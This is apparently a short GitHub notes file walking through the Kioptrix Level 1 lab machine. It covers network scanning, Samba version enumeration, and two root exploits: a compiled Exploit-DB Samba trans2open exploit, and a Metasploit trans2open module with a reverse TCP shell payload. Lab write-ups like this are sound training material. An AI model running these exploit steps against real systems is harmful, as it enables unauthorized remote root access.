-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathKioptrix Level 1
52 lines (35 loc) · 1.31 KB
/
Kioptrix Level 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
################
arp-scan -l
IP: 192.168.230.142
###########################
nmap -sV -p- 192.16.230.142
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-08-19 03:15 EDT
Nmap scan report for 192.168.230.142
Host is up (0.00020s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: jMYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status 1 (RPC #100024)
###########################
enum4linux 192.168.230.142
$ we found it's Samba 2.2.1a
####################################3
Two way to hack into this system.
1)
searchsploit samba|grep 2.2
Samba 2.2.8 - Remote Root Exploit | ./linux/remote/10.c
cp /usr/share/exploitdb/platforms/linux/remote/10.c .
gcc 10.c -o samba-exploit
./samba-exploit -b0 192.168.230.142
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2)
use exploit/linux/samba/trans2open
set PAYLOAD generic/shell_reverse_tcp
set RHOST 192.168.230.142
set LHOST 192.168.230.128
exploit
/$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$